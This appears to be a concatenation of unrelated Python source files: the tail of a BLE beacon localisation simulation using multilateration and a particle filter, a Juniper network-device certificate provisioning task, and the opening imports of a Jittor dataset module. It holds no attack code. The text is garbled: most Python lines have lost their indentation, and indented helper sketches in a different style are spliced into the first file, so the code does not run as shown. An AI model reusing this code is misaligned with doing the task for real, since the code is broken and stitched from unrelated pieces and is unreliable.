# when trying all possible x and y, this x and y should not be equal to a receiver's position, since then it would not form a line
# if it is equal to the receivers position, the intersection should return None
# so findRectangleLineSegmentIntersectionPoints function should return None if points to make the lines are equal
# also if intersection is at a corner(which means intersect only at 1 point, then it should return None for this case as well since intersection dist would be zero already)
receiverMeanRoomIntersection = findRectangleLineSegmentIntersectionPoints(receiverPositions[i],np.array([x,y]),roomPosition,roomWidth,roomLength)
if receiverMeanRoomIntersection is not None:
#print "receiverMeanRoomIntersection" + str(receiverMeanRoomIntersection)
strengtheningAmount+=np.linalg.norm(receiverMeanRoomIntersection[0,:]-receiverMeanRoomIntersection[1,:]) * WallRoomRatio * material_SignalDisturbance_Coefficients[ roomMaterials[roomIndex] ]
maxCatchableSignalDistance = RSSI_to_distance( minValidSignal + strengtheningAmount) + safetyOffset
if np.linalg.norm( [x,y] - receiverPositions[i] ) < maxCatchableSignalDistance: # we see it as None, so it should not be closer than maxCatchableSignalDistance. If so, then punish
tmp_sum+=( abs( np.linalg.norm( [x,y] - receiverPositions[i] ) - maxCatchableSignalDistance ) / ( np.linalg.norm( [x,y] - receiverPositions[i] ) + safetyOffset ) ) ** 2
# above, we penalized according to how far our estimated distance was from the actual one
# here we penalize the [x,y] under consideration more the closer it is, because we believe it should really be farther away (only the 1/... parts differ)
#with open('deneme.txt', 'a') as the_file:
# the_file.write("x,y is : " + str([x,y]) + "\n" + "sum is: " + str(tmp_sum) + "\n")
if tmp_sum < mysum:
mysum = tmp_sum
resultingPoint=[x,y]
##print "x,y is : " + str([x,y])
##print "sum is: " + str(tmp_sum)
##print "receiverPositions are" + str(receiverPositions)
##print "distToReceivers are " + str(distToReceiversArray)
##print "the sum is : " + str(mysum)
#with open('deneme.txt', 'a') as the_file:
# the_file.write("resultingPoint is : " + str(resultingPoint) + "\n")
return resultingPoint
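# A toy check (illustrative, never called) of the grid-search objective used in
# custom_minimize above: with noise-free distances to three receivers and no obstacles, the
# candidate grid point closest to the true position should minimize the sum of squared
# relative range residuals. Receiver positions and the true position are made up.
def _sketch_multilateration_objective(true_pos=np.array([2.0, 1.0]), step=0.1):
    receivers = [np.array([0.0, 0.0]), np.array([5.0, 0.0]), np.array([0.0, 3.0])]
    dists = [np.linalg.norm(true_pos - r) for r in receivers]        # perfect ranges
    best, best_sum = None, float('inf')
    for x in np.arange(xdims[0], xdims[1], step):
        for y in np.arange(ydims[0], ydims[1], step):
            s = sum((abs(np.linalg.norm([x, y] - r) - d) / d) ** 2
                    for r, d in zip(receivers, dists))
            if s < best_sum:
                best, best_sum = [x, y], s
    return best                                   # should land on (or next to) true_pos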
# after the signal is transmitted it may hit a wall and be reduced in strength;
# since we cannot manipulate it once transmission is done, we reduce the signal at transmission time, assuming with some probability that it will hit something;
# we then have to increase it again with some probability
def weakenedSignal(RSSI,maxSignalError):
return RSSI - uniform(0,maxSignalError)
def create_uniform_particles(x_range, y_range, NumberOfParticles):
particles = np.empty((NumberOfParticles, 2))
particles[:, 0] = uniform(x_range[0], x_range[1], size=NumberOfParticles)
particles[:, 1] = uniform(y_range[0], y_range[1], size=NumberOfParticles)
return particles
# for each receiver hold a separate signal strength map
# each beacon should have its interpolation over the whole map; then we should take a weighted average of these beacons' signal strength values
# For example, FOR RECEIVER 1, if beacon1 is at [5,5] and beacon2 is at [10,3] and the point we want to interpolate is at [10,5], Beacon2 should have the higher vote in determining the signal strength
# signal strength values of the beacons (fingerprint positions) are different for each receiver, therefore we hold a separate map for each receiver
def interpolateFingerPrintingResult():
xElems=np.arange(xdims[0],xdims[1],sensitivityOfResult)
yElems=np.arange(ydims[0],ydims[1],sensitivityOfResult )
allPosDistancesToReceivers={} # make it a dictionary where the key is 2d position
for i in range(numberOfReceivers):
for x in xElems:
for y in yElems:
allPosDistancesToReceivers[i,x,y]=np.linalg.norm(receiverPositions[i]- [x,y])
numberOfBeacons=fingerPrintingSignalStrengthBeaconsToReceivers.shape[1]
allPosDistancesToBeacons={} # make it a dictionary where the key is 2d position
for k in range(numberOfBeacons):
for x in xElems:
for y in yElems:
allPosDistancesToBeacons[k,x,y]=np.linalg.norm(fingerPrintingBeaconPositions[k]- [x,y])
# INITIALIZE INTERPOLATION MAP FOR EACH RECEIVER
global interpolatedSignalStrenghForAllPositions_forEachReceiver
for i in range(numberOfReceivers):
for x in xElems:
for y in yElems:
interpolatedSignalStrenghForAllPositions_forEachReceiver[i,x,y]=0
for i in range(numberOfReceivers):
for x in xElems:
for y in yElems:
minDist=np.float('inf')
min_k=0
# find the closest beacon to [x,y]
for k in range(numberOfBeacons):
if allPosDistancesToBeacons[k,x,y] < minDist:
min_k=k
minDist = allPosDistancesToBeacons[k,x,y]
base_dist=np.linalg.norm(fingerPrintingBeaconPositions[min_k]-receiverPositions[i])
target_dist=allPosDistancesToReceivers[i,x,y]
base_RSSI=fingerPrintingSignalStrengthBeaconsToReceivers[i][min_k]
# whichever beacon or receiver is the closest to [x,y], it should determine the interpolation result
# or, where the receivers are closer, those points could simply stay at 0, etc.
# and finally the receiver supplies these estimated values as if there were no blocks at all
interpolatedSignalStrenghForAllPositions_forEachReceiver[i,x,y]+=calc_relative_RSSI(base_dist,target_dist,base_RSSI)
print "calc_relative_RSSI is: " + str( calc_relative_RSSI(base_dist,target_dist,base_RSSI) )
print interpolatedSignalStrenghForAllPositions_forEachReceiver
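# A reduced sketch (never called) of the fingerprint interpolation idea above: for a query
# point, pick the nearest fingerprinted beacon and shift its recorded RSSI by the log-distance
# difference between that beacon's distance to the receiver and the query point's distance to
# the receiver (calc_relative_RSSI below). Assumes receiverPositions has already been
# populated, which happens in main().
def _sketch_fingerprint_lookup(query_xy, receiver_idx=0):
    dists = [np.linalg.norm(b - query_xy) for b in fingerPrintingBeaconPositions]
    k = int(np.argmin(dists))                                 # nearest fingerprint beacon
    base_dist = np.linalg.norm(fingerPrintingBeaconPositions[k] - receiverPositions[receiver_idx])
    target_dist = np.linalg.norm(receiverPositions[receiver_idx] - query_xy)
    base_rssi = fingerPrintingSignalStrengthBeaconsToReceivers[receiver_idx][k]
    return calc_relative_RSSI(base_dist, target_dist, base_rssi)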
def calc_relative_RSSI(base_dist, target_dist, base_RSSI):
print "calc_relative_RSSI: " + str( np.log ( (target_dist+safetyOffset) / (base_dist+safetyOffset) ) )
if target_dist >= 1:
return base_RSSI + -20 * np.log ( (target_dist) / (base_dist+safetyOffset) )
else:
return zero_one_meter_distance_to_RSSI(target_dist)
#distance in meters, returns RSSI in dBm
# assuming the signal propagation constant is 2, https://www.rn.inf.tu-dresden.de/dargie/papers/icwcuca.pdf in equation (4)
# when the distance goes from 4 to 8 the log term goes from 0.6 to 0.9 (the output is multiplied by a negative), so the output decreases more slowly as dist grows
# in zero_one_meter_distance_to_RSSI, on the other hand, when dist goes from 0.1 to 0.2 the result goes from 0.15 to 0.34 -> i.e. the RSSI decreases faster
def distance_to_RSSI(distance):
res_RSSI = 0
##print "distance is: " + str(distance)
if distance >=1:
res_RSSI = -20 * np.log10(distance) + rssiAtOne
else:
res_RSSI = zero_one_meter_distance_to_RSSI(distance)
return float(res_RSSI)
#RSSI in dBm, returns distance in meter
def RSSI_to_distance(RSSI):
res_distance = 0
if RSSI <= rssiAtOne:
res_distance = 10**( (RSSI-rssiAtOne) / -20 )
else:
res_distance = zero_one_meter_RSSI_to_distance(RSSI)
return float(res_distance)
# EXPONENTIAL FUNCTION BETWEEN 0 and 1
def zero_one_meter_RSSI_to_distance(RSSI):
#return float( np.log( (np.e - 1)/rssiAtOne * RSSI + 1 ) )
return 10**( ( ( RSSI - TX_Power ) * np.log10(2) ) / (rssiAtOne - TX_Power) ) -1
# should return something between TX power and rssiAtOne
def zero_one_meter_distance_to_RSSI (dist):
#return float( rssiAtOne * ( (np.exp(dist) - 1) / (np.e - 1) ) )
return float( TX_Power + (rssiAtOne - TX_Power) * ( (np.log10(dist+1)) / (np.log10(2) ) ) )
#float( (1-dist)*TX_Power + dist*rssiAtOne
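# A quick round-trip sanity sketch (never executed on import) for the two RSSI/distance model
# pieces above: for d >= 1 m the log-distance model with exponent 2 applies, below 1 m the
# interpolating sub-meter curve applies, and in both regimes RSSI_to_distance inverts
# distance_to_RSSI. The test distances are arbitrary examples.
def _sketch_rssi_distance_roundtrip():
    for d in (0.3, 0.8, 1.0, 2.0, 5.0, 10.0):
        rssi = distance_to_RSSI(d)      # e.g. at 2 m: rssiAtOne - 20*log10(2) ~= -71 dBm
        d_back = RSSI_to_distance(rssi)
        assert abs(d_back - d) < 1e-6, (d, rssi, d_back)
    return True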
# N_eff : Effective weight number
def neff(weights):
return 1.0 / np.sum(np.square(weights))
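# A small illustration (never called) of the effective sample size computed by neff above:
# uniform weights give N_eff = N, a single dominant weight gives N_eff close to 1, and the
# filter resamples when N_eff drops below N/2 (see the animate function further below).
def _sketch_neff_behaviour(n=NumberOfParticles):
    uniform_w = np.ones(n) / n
    degenerate_w = np.zeros(n)
    degenerate_w[0] = 1.0
    # neff(uniform_w) == n, neff(degenerate_w) == 1.0; resampling triggers when neff < n/2
    return neff(uniform_w), neff(degenerate_w), neff(uniform_w) < n / 2.0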
def getReceiverPositionsToInstall(xdims,ydims,numberOfReceivers):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
#reaOfTheMap=int( (ymax-ymin)*(xmax-xmin) )
step_size=(1/( np.ceil(np.sqrt(numberOfReceivers*1000) ) ) )
while True:
#initial_points=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax], size=(areaOfTheMap*2,2)) # I deleted .tolist()
#x_step_size=(xdims[1]-xdims[0])/3
#y_step_size=(ydims[1]-ydims[0])/3
#print "step_size is: " + str(step_size)
initial_points = np.mgrid[0:1+step_size:step_size, 0:1+step_size:step_size].reshape(2,-1).T
#print "initial_points are " + str(initial_points)
print "initial_points shape is: " + str(initial_points.shape)
receiverPositions = KMeans(n_clusters=numberOfReceivers, random_state=0,n_init=100).fit(initial_points).cluster_centers_
#receiverPositions=kmeans(initial_points,numberOfReceivers)
if receiverPositions is not None:
##print "initial receiver positions area " + str(receiverPositions)
receiverPositions[:,0]=xmin+receiverPositions[:,0]*(xmax-xmin)
receiverPositions[:,1]=ymin+receiverPositions[:,1]*(ymax-ymin)
##print "after receiverPositions are " + str(receiverPositions)
return receiverPositions
#return initial_points
def getBlockPositionsToInstall(xdims,ydims,numberOfBlocks):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
numberOfBlocksCreated=0
blockPositionsToInstall=[]
while numberOfBlocksCreated!=numberOfBlocks:
blockCoord=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax])
collisionExists=False
for receiverPosition in receiverPositions:
if checkRectangleRectangleIntersection(blockCoord,blockWidth,blockLength,receiverPosition,receiverWidth,receiverLength):
collisionExists=True
break
intersectionWithOtherBlocksExists=False
if not collisionExists: # if collision exists, do not make other checks
for blockPosition in blockPositionsToInstall:
if checkRectangleRectangleIntersection(blockCoord,blockWidth,blockLength,blockPosition,blockWidth,blockLength):
intersectionWithOtherBlocksExists=True
break
if not collisionExists and not intersectionWithOtherBlocksExists:
blockPositionsToInstall.append(blockCoord)
numberOfBlocksCreated+=1
#print numberOfBlocksCreated
return np.array(blockPositionsToInstall)
def getRoomPositionsToInstall(xdims,ydims,numberOfRooms,roomBoundary):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
numberOfRoomsCreated=0
roomPositionsToInstall=[]
while numberOfRoomsCreated!=numberOfRooms:
roomCoord=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax])
receiverHollowRoomCollisionExists=False
for receiverPosition in receiverPositions:
if not checkFirstRectangleContainsSecondRectangle(roomCoord,roomWidth,roomLength,receiverPosition,receiverWidth,receiverLength,boundaryForFirstRect=-roomBoundary) and \
checkRectangleRectangleIntersection(roomCoord,roomWidth,roomLength,receiverPosition,receiverWidth,receiverLength,boundaryForFirstRect=roomBoundary):
receiverHollowRoomCollisionExists=True
break
intersectionWithBlocksExists=False
if not receiverHollowRoomCollisionExists:
for blockPosition in blockPositions:
if checkRectangleRectangleIntersection(roomCoord,roomWidth,roomLength,blockPosition,blockWidth,blockLength,boundaryForFirstRect=roomBoundary):
intersectionWithBlocksExists=True
break
intersectionWithOtherRoomsExists=False
if not receiverHollowRoomCollisionExists and not intersectionWithBlocksExists:
for roomPosition in roomPositionsToInstall:
if checkRectangleRectangleIntersection(roomCoord,roomWidth,roomLength,roomPosition,roomWidth,roomLength,boundaryForFirstRect=roomBoundary,boundaryForSecondRect=roomBoundary):
intersectionWithOtherRoomsExists=True
break
if not receiverHollowRoomCollisionExists and not intersectionWithBlocksExists and not intersectionWithOtherRoomsExists:
roomPositionsToInstall.append(roomCoord)
numberOfRoomsCreated+=1
#print numberOfRoomsCreated
return np.array(roomPositionsToInstall)
# main function
# strongSignalDistance -> to how many meters we accept this signal as strong. We use it for confidence ellipse calculations
# sensitivityOfResult -> how much sensitive we are about the final position of our object of interest
# maxSignalError -> signals are erroneous in real life; to simulate this, add noise up to this number
# minValidSignal -> min signal value we use for distance calculation
# minSignalValue -> min signal that we can still find, if a signal is lower than that(if receiver is far away), then this receiver(s) cannot catch this signal.
# movingLimit -> how many meters at a time our object moves at max
# movingTendency -> in what direction and meters our object tends to move
def cleanup(*args):
global currPersonNumber
plt.savefig(str("Person")+str(currPersonNumber)+".png", bbox_inches="tight")
exit()
def animate_dummy_init():
pass
def animate(iterNo, ax, macID, currPerson, NumberOfParticles, xdims=(0, 50), ydims=(0, 50), maxSignalError=20, movingLimit=2, pastCoeff=0, minValidSignal=-90,
minSignalValue=-100,numberOfReceivers=4, sensitivityOfResult=1.0, strongSignalDistance=5 , movingTendency=np.array([0,0]) ):
global currPersonNumber
signal(SIGTERM, cleanup)
ax.clear()
#print "iterNo is: " + str(iterNo)
#if iterNo == 0: # for now let there be just a single person
ax.set_xlim(*xdims)
ax.set_ylim(*ydims)
ax.set_aspect('equal',adjustable='box')
minSideLenghtOfTheMap=np.maximum(xdims[1]-xdims[0],ydims[1]-ydims[0])
tickStepSize=np.ceil(minSideLenghtOfTheMap/40)
xstart,xend = ax.get_xlim()
ystart,yend = ax.get_ylim()
ax.xaxis.set_ticks(np.arange(xstart, xend+tickStepSize, tickStepSize ))
ax.yaxis.set_ticks(np.arange(ystart, yend+tickStepSize, tickStepSize ))
ax.tick_params(axis="x", labelsize=20 * sizeIncrementRatio)
ax.tick_params(axis="y", labelsize=20 * sizeIncrementRatio)
start_time = time.time()
#print "linewidth_from_data_units"
roomLineWidth=linewidth_from_data_units(roomWallWidth,ax)
currPerson.move_beacon_in_map(xdims,ydims,movingLimit,movingTendency,roomBoundary=roomWallWidth/2)
#currPerson.beacon_pos = predefinedPos[iterNo]
#print "beacon pos is: " + str(currPerson.beacon_pos)
currPerson.calc_RSSIs_to_Receivers(minSignalValue,minValidSignal,maxSignalError )
currPerson.setBeaconDistances_fromRSSIs(minValidSignal)
global numberOfNotFounds
print iterNo
isProcessed=False
if all(dist is None for dist in currPerson.distToReceivers):
#print "all distances are None, no processing"
numberOfNotFounds+=1
pass
else:
currPerson.averaged_beacon_pos = currPerson.multiLateration(xdims,ydims,sensitivityOfResult)
print "real pos is: " + str(currPerson.beacon_pos)
print "multilateratiion pos is: " + str(currPerson.averaged_beacon_pos)
#print "averaged_beacon_pos for " + macID + " is: " + str(currPerson.averaged_beacon_pos)
#print "the real pos for " + macID + " is: " + str(currPerson.beacon_pos)
# 1st STEP
currPerson.predict_BLE(no_of_noise_elements = NumberOfParticles, movingLimit=movingLimit, pastCoeff = pastCoeff, xdims=xdims, ydims=ydims,movingTendency=movingTendency )
# 2nd STEP
currPerson.update_weights()
# resample if too few effective particles
if neff(currPerson.weights) < NumberOfParticles/2.0:
tmp_particles=np.zeros((NumberOfParticles, 2))
tmp_weights = np.zeros(NumberOfParticles)
tmp_particles[:]=currPerson.particles[:]
tmp_weights[:]=currPerson.weights[:]
currPerson.resample_from_higher_weights(tmp_particles, tmp_weights)
if np.allclose(tmp_weights, 1.0/NumberOfParticles):
currPerson.weights[:]=tmp_weights[:]
currPerson.particles[:]=tmp_particles[:]
else:
#print "no resampling is made for iteration " + iterNo
pass
currPerson.calc_PDF(strongSignalDistance,pastCoeff)
currPerson.prevCovMatrix=currPerson.covMatrix # calc_PDF reads self.prevCovMatrix, so store it under that attribute name
currPerson.x_pp[:] = currPerson.x_prev[:] # or np.copyto(x_pp,x_prev)
currPerson.x_prev[:] = currPerson.particles[:] # or np.copyto(x_prev,particles)
global OverallError
CurrAccuracy = np.linalg.norm(currPerson.mu-currPerson.beacon_pos)
OverallError += CurrAccuracy
if iterNo == totalIterNo-1:
print "OverallError error is: " + str(OverallError)
print "average Error is: " + str(OverallError/(totalIterNo-numberOfNotFounds) )
print "numberOfNotFounds is: " + str(numberOfNotFounds)
##print "mean particle pos for " + macID + " is at " + str(currPerson.mu)
##print "max_weighted_particle pos for " + macID + " is at " + str(currPerson.max_weighted_particle)
##print "beacon for " + macID + " is at " + str(currPerson.beacon_pos)
##print "Final Accuracy is: " + str(CurrAccuracy) + " meter(s)"
##print "Final currPerson.covMatrix matrix is: " + str(currPerson.covMatrix)
# https://stackoverflow.com/questions/20126061/creating-a-confidence-ellipses-in-a-sccatterplot-using-matplotlib
particles_x,particles_y=np.hsplit(currPerson.particles,2)
if not np.isnan(currPerson.covMatrix).any() and \
not np.isinf(currPerson.covMatrix).any():
# Ellipse drawing code logic below is borrowed from Jaime's answer in https://stackoverflow.com/questions/20126061/creating-a-confidence-ellipses-in-a-sccatterplot-using-matplotlib/20127387
#The following code draws a one, two, and three standard deviation sized ellipses:
eigVals, eigVecs = np.linalg.eig(currPerson.covMatrix)
eigVals = np.sqrt(eigVals)
# larger eigenvalue should be the width and
# the angle is the ccw angle between the eigenvector of the corresponding eigenvalue and the positive x axis
color1,color2,color3=0.0,0.0,0.0 # color components for the hollow error ellipses
for j in range(1, 4):
ell = Ellipse(xy=(np.mean(particles_x),np.mean(particles_y)),
width=eigVals[np.argmax(abs(eigVals))]*j*2, height=eigVals[1-np.argmax(abs(eigVals))]*j*2,
angle=np.rad2deg(np.arctan2(*eigVecs[:,np.argmax(abs(eigVals))][::-1])))
color1+=0.3
color2+=0.2
color3+=0.25
#ell.set_facecolor((color1, color2, color3))
ell.set_edgecolor((color1, color2, color3))
ell.set_fill(False)
ell.set_linewidth(5.0)
ax.add_artist(ell)
else:
pass # do not draw any ellipses
# draw particles
ellipses = [Ellipse(xy=(xi,yi), width=particleWidth, height=particleHeight, linewidth=0, facecolor='black') for xi,yi in zip(currPerson.particles[:, 0],currPerson.particles[:, 1])]
c = collections.PatchCollection(ellipses)
ax.add_collection(c)
muPlot = Ellipse(xy=(currPerson.mu[0],currPerson.mu[1]), width=OOIWidth, height=OOIHeight, linewidth=0, facecolor='purple')
maxWeightedPlot = Ellipse(xy=(currPerson.max_weighted_particle[0],currPerson.max_weighted_particle[1]), width=OOIWidth, height=OOIHeight, linewidth=0, facecolor='orange')
ax.add_artist(muPlot)
ax.add_artist(maxWeightedPlot)
ax.text(0.3,1.03,s=r"\textbf{POI MACID = " + str(macID) + "}\n" + r"\textbf{Person" + str(currPersonNumber) + " / Time Step: " + str(iterNo) + "}\nCurrent Accuracy is: " + str(float("{0:.2f}".format(CurrAccuracy))) + "m"
, horizontalalignment='left' , verticalalignment='bottom' , fontsize=sizeIncrementRatio*13, transform=ax.transAxes )
isProcessed = True
# draw room, blocks and receivers in this way, since otherwise they do not appear in the map
if numberOfRooms > 0:
roomBottomLeft=roomPositions-np.array( [roomWidth/2,roomLength/2])
for roomIndex, roomPosition in enumerate(roomBottomLeft):
roomColor=materialColors[ roomMaterials[roomIndex] ]
ax.add_patch( Rectangle(roomPosition,roomWidth,roomLength,linewidth=roomLineWidth,edgecolor=roomColor,facecolor='None') ) # thick borders without a face (no interior fill) make a rectangle with a hole
if numberOfBlocks > 0:
blockBottomLeft=blockPositions-np.array( [blockWidth/2,blockLength/2])
for blockIndex, blockPosition in enumerate(blockBottomLeft):
blockColor=materialColors[ blockMaterials[blockIndex] ]
ax.add_patch( Rectangle(blockPosition,blockWidth,blockLength,linewidth=1,edgecolor=blockColor,facecolor=blockColor) )
if numberOfReceivers > 0:
receiverBottomLeft=receiverPositions-np.array( [receiverWidth/2,receiverLength/2])
for receiverPosition in receiverBottomLeft:
ax.add_patch( Rectangle(receiverPosition,receiverWidth,receiverLength,linewidth=1,edgecolor='darkblue',facecolor='darkblue') )
#elapsed_time = time.time() - start_time
#print "elapsed_time is: " + str(elapsed_time)
#time.sleep(1-elapsed_time)
beaconPosPlot = Ellipse((currPerson.beacon_pos[0],currPerson.beacon_pos[1]), width=OOIWidth, height=OOIHeight, linewidth=0, facecolor='green')
ax.add_artist(beaconPosPlot)
#plt.tight_layout(pad=4*(55.0/42.0))
plt.subplots_adjust(left=0,bottom=0.1,right=1,top=0.85,wspace=0,hspace=0)
if currPersonNumber == 1 and iterNo == 65:
os.kill(os.getpid(), SIGTERM)
elif currPersonNumber == 2 and iterNo == 59:
os.kill(os.getpid(), SIGTERM)
elif currPersonNumber == 3 and iterNo == 59:
os.kill(os.getpid(), SIGTERM)
elif currPersonNumber == 4 and iterNo == 43:
os.kill(os.getpid(), SIGTERM)
elif currPersonNumber == 5 and iterNo == 31:
os.kill(os.getpid(), SIGTERM)
if currPersonNumber == 6 and iterNo == 17:
os.kill(os.getpid(), SIGTERM)
#if isProcessed:
# ax.legend([beaconPosPlot, muPlot, maxWeightedPlot], ['BLE Beacon Pos', 'Mean Of Particles', 'Most Weighted Particle'], loc="lower left", prop={'size': (50.0/42.0)*10}, bbox_to_anchor=(0, 1))
#else:
# ax.legend([beaconPosPlot], ['BLE Beacon Pos'], loc="lower left", prop={'size': (50.0/42.0)*10}, bbox_to_anchor=(0, 1))
####################################################################################################################################################################################
if __name__ == '__main__':
main()
|
cert.py
|
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER
# Copyright (c) 2018 Juniper Networks, Inc.
# All rights reserved.
# Use is subject to license terms.
#
# Author: cklewar
import re
import threading
import time
from jnpr.junos.utils.scp import SCP
from ncclient.operations import RPCError, TimeoutExpiredError
import lib.constants as c
from lib.logmsg import LogCertTask as logmsg
from lib.logmsg import LogCommon
from lib.tasks.task import Task
from lib.tasks.tasktools import ChannelCancellation
from lib.tasks.tasktools import Configuration
from lib.tasks.tasktools import SSHPortForward
from lib.tools import Tools
class CertTask(Task):
CHECK_SCHEMA = True
TASK_TYPE = c.TASK_TYPE_PROVISION
TASK_VERSION = 1.0
def __init__(self, sample_device=None, shared=None):
super(CertTask, self).__init__(sample_device=sample_device, shared=shared)
self.logger.debug(Tools.create_log_msg(self.task_name, self.sample_device.deviceSerial,
LogCommon.IS_SUBCLASS.format(self.task_name,
issubclass(CertTask, Task))))
def pre_run_task(self):
pass
def run_task(self):
cancel_chan = ChannelCancellation()
e = threading.Event()
status, data = Tools.get_config(lookup_type=c.CONFIG_LOOKUP_TYPE_GET_DEVICE_CFG,
sample_device=self.sample_device)
if status:
if self.grp_cfg.TASKS.Provision.Cert.PortForwarding:
if self.sample_device.deviceServicePlugin != c.SERVICEPLUGIN_OSSH:
with SCP(self.sample_device.deviceConnection, progress=False) as scp:
scp.put(c.conf.SERVICES.Ossh.LocalConfigFile, c.SSHD_PORT_FWD_PATH)
self.logger.info(Tools.create_log_msg(self.task_name, self.sample_device.deviceSerial,
logmsg.CERT_FILE_OK.format(
self.sample_device.deviceSerial)))
self.sample_device.deviceConnection.close()
status, self.sample_device = Tools.create_dev_conn(self.sample_device)
if status:
thr = threading.Thread(target=self.do_cert_requests, args=(data, e, cancel_chan,))
thr.start()
ssh_pfwd = SSHPortForward(sample_device=self.sample_device, grp_cfg=self.grp_cfg, event=e,
cancel_chan=cancel_chan)
ssh_pfwd.init_port_fwd()
else:
return False, 'Error in device connection'
else:
thr = threading.Thread(target=self.do_cert_requests, args=(data, e, cancel_chan,))
thr.start()
ssh_pfwd = SSHPortForward(sample_device=self.sample_device, grp_cfg=self.grp_cfg, event=e,
cancel_chan=cancel_chan)
ssh_pfwd.init_port_fwd()
else:
self.do_cert_requests(datavars=data, event=None)
else:
self.logger.info(Tools.create_log_msg(self.task_name, self.sample_device.deviceSerial,
logmsg.CERT_DEV_DATA_NOK))
def do_cert_requests(self, datavars=None, event=None, cancel_chan=None):
# Do time sync before getting certs
req0 = 'set date ntp {0}'.format(datavars['device']['ntp_server'])
req1 = 'request security pki ca-certificate enroll ca-profile ' + datavars['device']['cert'][
'ca_profile']
req2 = 'request security pki ca-certificate verify ca-profile ' + datavars['device']['cert'][
'ca_profile']
req3 = 'request security pki generate-key-pair certificate-id ' + datavars['device']['hostname'] \
+ ' size 2048 type rsa'
req4 = 'request security pki local-certificate enroll ca-profile ' + datavars['device']['cert'][
'ca_profile'] \
+ ' certificate-id ' + datavars['device']['hostname'] + ' domain-name ' + \
datavars['device']['cert']['domain_name'] \
+ ' subject ' + datavars['device']['cert']['subject'] + ' challenge-password ' \
+ datavars['device']['cert']['challenge_password']
pattern = r'(error):\s.*'
regex = re.compile(pattern, re.MULTILINE)
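# Hedged illustration (hypothetical values, not from the original source): with
# hostname 'srx-01' and ca_profile 'lab-ca', req1 renders as
# 'request security pki ca-certificate enroll ca-profile lab-ca' and req3 as
# 'request security pki generate-key-pair certificate-id srx-01 size 2048 type rsa'.
# The regex above is used further down to flag CLI responses containing lines such as
# 'error: <reason>'.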
if event is not None:
event.wait()
self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS, task_state_message='Request Time Sync')
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD.format(req0))
resp = self.sample_device.deviceConnection.cli(command=req0, format='text', warning=False)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD_RESP.format(req0, resp))
try:
self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS, task_state_message='Request CA Cert')
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD.format(req1))
resp = self.sample_device.deviceConnection.cli(command=req1, format='text', warning=False)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD_RESP.format(req1, resp))
status = re.findall(regex, resp)
if len(status) > 0 and status[0] == 'error':
self.update_task_state(new_task_state=c.TASK_STATE_FAILED, task_state_message=resp)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=resp)
return
else:
self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS, task_state_message='Verify CA Cert')
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD.format(req2))
resp = self.sample_device.deviceConnection.cli(command=req2, format='text', warning=False)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD_RESP.format(req2, resp))
status = re.findall(regex, resp)
if len(status) > 0 and status[0] == 'error':
self.update_task_state(new_task_state=c.TASK_STATE_FAILED, task_state_message=status)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=status)
return
else:
self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
task_state_message='Generate local keys')
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD.format(req3))
resp = self.sample_device.deviceConnection.cli(command=req3, format='text', warning=False)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD_RESP.format(req3, resp))
status = re.findall(regex, resp)
if len(status) > 0 and status[0] == 'error':
self.update_task_state(new_task_state=c.TASK_STATE_FAILED, task_state_message=status)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=status)
return
else:
self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
task_state_message='Request local cert')
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD.format(req4))
resp = self.sample_device.deviceConnection.cli(command=req4, format='text', warning=False)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.CERT_ISSUE_CMD_RESP.format(req4, resp))
status = re.findall(regex, resp)
if len(status) > 0 and status[0] == 'error':
self.update_task_state(new_task_state=c.TASK_STATE_FAILED, task_state_message=status)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=status)
return
else:
self.update_task_state(new_task_state=c.TASK_STATE_DONE,
task_state_message=c.TASK_STATE_MSG_DONE)
Tools.emit_log(task_name=self.task_name,
task_state={'taskState': self.task_state,
'taskStateMsg': c.TASK_STATE_MSG_DONE},
sample_device=self.sample_device, grp_cfg=self.grp_cfg,
shared=self.shared,
message=c.TASK_STATE_MSG_DONE,
scope=c.LOGGER_SCOPE_ALL, level=c.LOGGER_LEVEL_INFO)
time.sleep(5)
if cancel_chan is not None:
cancel_chan.cancel()
except (RPCError, TimeoutExpiredError) as err:
self.logger.info(Tools.create_log_msg(self.task_name, self.sample_device.deviceSerial,
logmsg.CERT_ISSUE_CMD_NOK.format(req0, err.message)))
self.sample_device.deviceTasks.taskState[self.task_name] = err.message
def post_run_task(self):
pass
|
dataset.py
|
# ***************************************************************
# Copyright (c) 2021 Jittor. All Rights Reserved.
# Maintainers:
# Meng-Hao Guo <guomenghao1997@gmail.com>
# Dun Liang <randonlang@gmail.com>.
#
# This file is subject to the terms and conditions defined in
# file 'LICENSE.txt', which is part of this source code package.
# ***************************************************************
import numpy as np
from urllib import request
import gzip
import pickle
import os
from jittor.dataset.utils import get_random_list, get_order_list, collate_batch, HookTimer
from collections.abc import Sequence, Mapping
import pathlib
